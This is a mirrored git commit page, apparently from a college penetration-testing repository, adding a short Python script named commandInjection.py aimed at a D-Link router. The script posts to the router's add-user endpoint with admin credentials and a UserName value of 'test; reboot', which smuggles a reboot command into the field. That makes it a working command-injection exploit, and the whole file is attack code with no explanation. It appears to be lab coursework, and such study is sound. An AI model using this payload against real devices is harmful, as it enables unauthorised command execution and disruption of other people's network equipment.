mirror of
https://github.com/bvanroll/college-pentesting.git
synced 2025-08-29 03:52:43 +00:00
idk man
This commit is contained in:
5
dlinkHacker/commandInjection.py
Normal file
5
dlinkHacker/commandInjection.py
Normal file
@@ -0,0 +1,5 @@
|
||||
from connections import *
|
||||
|
||||
|
||||
|
||||
print(postReq("http://192.168.1.219/setSystemAddUser", "admin", "Azerty123", {"ReplySuccessPage":"advanced.htm", "ReplyErrorPage":"errradv.htm","SessionKey":"1543011420", "UserName": "test; reboot", "Password":"aaaaaaaaaaaaaaa"}))
|
Reference in New Issue
Block a user